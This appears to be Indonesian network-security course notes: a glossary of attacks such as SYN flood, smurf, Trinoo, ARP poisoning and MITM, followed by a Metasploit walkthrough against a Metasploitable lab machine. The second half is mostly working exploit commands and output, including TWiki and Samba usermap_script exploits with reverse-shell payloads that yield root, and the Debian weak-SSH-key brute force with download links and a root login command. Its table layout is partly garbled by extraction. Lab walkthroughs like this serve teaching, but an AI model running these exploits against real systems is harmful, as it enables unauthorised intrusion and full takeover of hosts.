1. Macam-macam mekanisme serangan : a) Denial of Service Jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat memberikan layanan kepada pengguna. Beberapa cara DOS: Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding. Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding. b) SYN Flood SYN Flood merupakan salah satu bentuk serangan Denial Of Service (DOS) dimana penyerang akan mengirimkan SYN request kepada mesin sasaran dengan tujuan mengkonsumsi sumber daya dari server sehingga server tidak bisa melayani lalu lintas yang memang benar benar sah. Didalam kasus SYN Flood, code ACK (Fase 3 di Three Way Handshaking) tidak pernah di kirimkan kembali kepada server malah justru mengulangi SYN request ke semua port yang ada di server. Client membuat semua SYN request tampak valid namun karena IP addressnya adalah palsu maka tidaklah mungkin server untuk kemudian mengakhiri koneksi tersebut. Akibatnya koneksi masih tetap terbuka ( setengah terbuka) sehingga koneksi tidak juga terjalin ( tertutup) antara client dan server. Demikian seterusnya , lama kelamaan server akan menjadi sangat sibuk untuk merespon resquest yang tidak berujung, bahkan pada akhirnya client yang sah pun akan kesulitan masuk untuk terhubung ke server. c)
Ping of Death Jenis serangan ini mengguna kan utility ping. Mengapa disebut Ping of Death karena pada umumnya utility ping pada windows mengirimkan paket ping maksimal 65.536 bytes sedangkan Ping of Death mengirimkan lebih dari itu, misalnya saja 112.000 bytes dan paket ping of death ini mudah direkayasa, sehingga tidak bisa diketahui alamat pengirimnya (IP address). Untuk mencoba ping maksimal pada windows dapat digunakan command ping -l 65500 192.168.0.1 “ping-lbesarnya_pakettarget”. Secara tradisional, sangat mudah untuk mengeksploitasi bug ini. Secara umum, mengirimkan paket 65.536 byte ping adalah illegal menurut protokol jaringan, tetapi sebuah paket semacam ini dapat dikirim jika paket tersebut sudah terpecah-pecah, Ketika komputer target menyusun paket yg sudah terpecah-pecah tersebut, sebuah buffer overflow mungkin dapat terjadi, dan ini yang sering menyebabkan sistem crash.
d) Smurf attack Smurf attack adalah serangan secara paksa pada fitur spesifikasi IP yang kita kenal sebagai direct broadcast addressing. Seorang Smurf hacker biasanya membanjiri router kita dengan paket permintaan echo Internet Control Message Protocol (ICMP) yang kita kenal sebagai aplikasi ping. Karena alamat IP tujuan pada paket yang dikirim adalah alamat broadcast dari jaringan anda, maka router akan mengirimkan permintaan ICMP echo ini ke semua mesin yang ada di jaringan. Kalau ada banyak host di jaringan, maka akan terjadi trafik ICMP echo respons & permintaan dalam jumlah yang sangat besar. Semakin banyak komputer yang terdapat di dalam jaringan yang sama dengan target, maka semakin banyak pula ICMP echo reply yang dikirimkan kepada target, sehingga akan membanjiri sumber daya komputer target, dan mengakibatkan kondisi penolakan layanan (Denial of Service) yang menjadikan para pengguna tidak dapat mengakses layanan yang terdapat di dalam komputer yang diserang. Beberapa sistem bahkan mengalami crash atau hang, dan lagi, banjir yang berisi paket-paket "ICMP echo request/reply" akan membuat kongesti (kemacetan) jaringan yang dapat memengaruhi komputer lainnya.
e)
UDP Flood UDP (User Datagram Protocol) flood adalah Serangan yang memanfaatkan protokol UDP yang connectionless untuk menyerang target. Karena sifatnya itulah UDP flood cukup mudah untuk dilakukan. Dengan cara, sejumlah paket data yang besar dikirimkan begitu saja kepada korban. Korban yang kaget dan tidak siap menerima serangan ini tentu akan bingung dan pada komputer server tersebut akan hang karena besarnya paket data yang diterima. Penyerang biasanya menggunakan tehnik spoofed (penyamaran) untuk menyembunyikan identitasnya.
f)
Distributed Denial of Service DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang „menyerang‟ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selamalamanya. Target serangan DoS attack bisa ditujukan ke berbagai bagian jaringan. Bisa ke routing devices, web, electronic mail, atau server Domain Name System.
g) Tribe flood network Jenis serangan DOS yang memanfaatkan perubahan sumber alamat IP palsu atau perubahan sumber alamat IP secara cepat sehingga memungkinkan penyerang untuk menggagalkan upaya korban yang ingin menyingkirkan serangan DOS. h) Trinoo Trinoo (trin00) merupakan program slave atau master terkenal yang digunakan dalam serangan DDoS. Jaringan Trinoo dapat memiliki ratusan atau bahkan ribuan sistem di internet yang diambil alih dengan mengeksploitasi buffer overrun secara remote. Akses ke sistem-sistem yang dijadikan agen tersebut didapatkan dengan menanamkan program backdoor yang sekaligus merupakan daemon Trinoo. Trinoo menggunakan TCP dan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah : Attacker to Master : 27665/tcp Master to Daemon : 27444/udp Daemon to Master(s) : 31335/udp i)
Stacheldraht Stacheldraht merupakan tool DDoS yang terdiri atas gabungan antara TFN (Tribe Flood Network) dan Trinoo, dengan tambahan feature lain, seperti enkripsi komunikasi antara komponen dan update secara otomatis pada daemon. Stacheldraht menggunakan TCP dan ICMP pada port : Client to handler : 16660/TCP Handler to and from agents : 65000/- TCP, ICMP ECHO_REPLY Tool Stacheldraht memiliki dua komponen, yaitu client dan handler. Penyerang dapat berinteraksi dengan handler, kemudian handler akan mengontrol client. Sistem pada client inilah yang melancarkan serangan kepada mesin target.
j)
Spoofing Spoofing merupakan tekn ik yang digunakan untuk memperoleh akses yang tidak sah ke suatu komputer, informasi, atau ke suat jejaring sosial, dimana penyerang berpura-pura memalsukan bahwa mereka adalah host pemilik sebenarnya dan atau host yang terpercaya.
k) DNS spoofing Memalsukan alamat IP dari sebuah domain. l)
IP spoofing
IP spoofing adalah salah satu teknik yang banyak digunakan di internet untuk menyembunyikan atau memalsukan source IP address sehingga asal dari paket network tidak bisa terlacak ataupun untuk mengelabui komputer tujuan. m) ARP spoofing ARP Spoofing adalah teknik dimana seorang penyerang mengirimkan Address Resolution Protocol (ARP) pesan palsu ke Local Area Network . Umumnya, bertujuan untuk mengasosiasikan MAC Address penyerang dengan IP Address target (seperti default gateway ), hal ini menyebabkan lalu lintas
yang ditujukan ke IP Address target akan dikirim ke penyerang sebagai gantinya. Spoofing ARP dapat memungkinkan seorang penyerang untuk mencegat frame data pada LAN, memodifikasi lalu lintas, atau menghentikan lalu lintas sama sekali. n) Web spoofing Web spoofing adalah kegiatan yang menipu pengunjung website dengan cara mengelabuhi korban atau user yang sedang mengakses website attacker yang mirip dengan website tujuan user, sedangkan user menginput username dan password yang di gunakan untuk mengakses data yang berada di dalam website tersebut. o) Man in the middle attack MITM attack adalah serangan dimana attacker berada di tengah dan dengan bebas mendengarkan dan mengubah percakapan antara dua pihak. Jadi dengan serangan MITM ini attacker tidak hanya pasif mendengarkan, tetapi juga aktif mengubah komunikasi yang terjadi. Sebagai contoh, pada percakapan antara Alice dan Bob, Charlie menjadi pihak yang ditengah melakukan MITM attack. Charlie tidak hanya bisa mendengarkan percakapan itu, namun juga bisa mengubah percakapannya. Ketika Alice berkata “Besok makan siang jam 7″, Charlie bisa mengubahnya menjadi “Besok makan siang dibatalkan” sehingga Bob mengira makan siang dengan Alice tidak jadi. p) ARP Poisoning Paket ARP dari komputer A ditujukan untuk komputer B, ketika komputer A mem-broadcast paket ARP di jaringan, maka komputer C (sang manipulator) dapat "meracuni" (Posioning) paket ARP tersebut agar paket ARP ditujukan ke komputer C terlebih dahulu baru di forward ke komputer B. Poisoning ini mengganti MAC Address komputer B dengan MAC Address komputer C di tabel ARP komputer A dan sebaliknya, MAC Address komputer A diganti menjadi MAC Address komputer C di tabel ARP komputer B. q) DNS Poisoning DNS Posioning adalah sebuah aksi untuk membelokkan akses menuju suatu website ke alamat website yang lain yang bisa membahayakan data dan informasi user. r)
Wireless attack Aktifitas serangan yang terjadi pada jaringan wifi tertentu dengan tujuan untuk membuat host korban crash atau hang dan bisa juga untuk mencuri data korban.
s)
Wireless sniffing Suatu aktifitas menyadap yang dilakukan dalam jaringan wifi tertentu.
t)
War driving Wardriving ialah suatu kegiatan mencari keberadaan jaringan Wireless LAN dan menandai lokasi akses point yang ditemukan, sambil berkendara di suatu daerah tertentu (biasanya dalam suatu kota). Biasanya yang menjadi incaran wardriver ialah jaringan nirkabel yang tidak diberi password atau enkripsi untuk melindunginya. Kegiatan ini dilakukan untuk mendapatkan informasi tentang suatu jaringan wifi dan mendapatkan akses terhadap jaringan wireless tersebut.
2. Exploit Pada Metasploit
1. Exploit pada vsftpd 2.3.4 (port 21): Melakukan exploit dengan menggunakan nmap pada host target (192.168.56.101).
2. Exploit port 80 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
msf > use exploit/unix/webapp/twiki_history msf exploit(twiki_history) > show options Module options (exploit/unix/webapp/twiki_history): Name ---Proxies RHOST RPORT URI VHOST
Current Setting --------------80 /twiki/bin
Required -------no yes yes yes no
Description ----------Use a proxy chain The target address The target port TWiki bin directory path HTTP server virtual host
Exploit target: Id -0
Name ---Automatic
msf exploit(twiki_history) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(twiki_history) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(twiki_history) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ZeiYbclsufvu4LGM; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Successfully sent exploit request [*] Reading from socket B [*] B: "ZeiYbclsufvu4LGM\r\n" [*] Matching... [*] A is input... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo D0Yvs2n6TnTUDmPF; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300 [*] Reading from socket B [*] B: "D0Yvs2n6TnTUDmPF\r\n" [*] Matching... [*] A is input... whoami www-data
Disini kita masih sebagai user biasa, tetapi kita bisa menjadi root dengan menggunakan udev exploit.
3. Exploit port 22 ssh Package OpenSSL yang terpasang di suatu sistem merupakan celah yang bisa dimasuki dengan menggunakan bruteforce exploit, karena pemberian angka acak yang lemah. Ini salah satu contoh angka acaknya: CVE-2008-0166
Kita bisa coba gunakan Ruby exploit : http://www.exploit-db.com/exploits/5632/ Sebelum kita jalankan exploitnya, kita harus men-download keys number : http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 #untuk dsa keys http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 #untuk rsa keys Lalu kita ketikkan seperti ini di terminal: ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/ ini bertujuan untuk melihat apakah akun root memiliki SSH key yang lemah, dan jika iya, akan muncul seperti ini: KEYFILE FOUND: 57c3115d77c56390332dc5c49978627a-5429 Setelah kita mendapat key-nya kita bisa gunakan untuk masuk sebagai root akun melalui SSH: ssh -l root -p 22 -i 57c3115d77c56390332dc5c49978627a-5429 192.168.127.154 4. Exploit port 23 telnet Kita bisa gunakan auxiliary module: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
msf > use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > show options Module options (auxiliary/scanner/telnet/telnet_version): Name Current Setting -----------------PASSWORD username RHOSTS CIDR identifier RPORT 23 THREADS 1 threads TIMEOUT 30 USERNAME as
Required -------no
Description ----------The password for the specified
yes
The target address range or
yes yes
The target port The number of concurrent
yes no
Timeout for the Telnet probe The username to authenticate
msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154
21 22 23 24 25 26 27 28 29 30 31 32 33 34
msf auxiliary(telnet_version) > run [*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login: [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
5. Exploit port 445 Samba Pertama, kita gunakan auxiliary module untuk mendapat informasi tentang server: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
msf > use auxiliary/scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting -----------------RHOSTS CIDR identifier SMBDomain WORKGROUP authentication SMBPass specified username SMBUser as THREADS 1 threads
Required -------yes
Description ----------The target address range or
no
The Windows domain to use for
no
The password for the
no
The username to authenticate
yes
The number of concurrent
msf auxiliary(smb_version) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 msf auxiliary(smb_version) > run [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Dengan informasi yang sudah kita dapat ini, kita bisa menggunakan teknik exploit yang sesuai: msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name ---RHOST RPORT
Current Setting --------------139
Exploit target:
Required -------yes yes
Description ----------The target address The target port
43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98
Id -0
Name ---Automatic
msf exploit(usermap_script) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(usermap_script) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name ---RHOST RPORT
Current Setting --------------192.168.127.154 139
Required -------yes yes
Description ----------The target address The target port
Payload options (cmd/unix/reverse): Name ---LHOST LPORT
Current Setting --------------4444
Required -------yes yes
Description ----------The listen address The listen port
Exploit target: Id -0
Name ---Automatic
msf exploit(usermap_script) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(usermap_script) > set RPORT 445 RPORT => 445 msf exploit(usermap_script) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo f8rjvIDZRdKBtu0F; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "f8rjvIDZRdKBtu0F\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300 whoami root
Kita bisa lihat, sekarang kita telah masuk sebagai root.
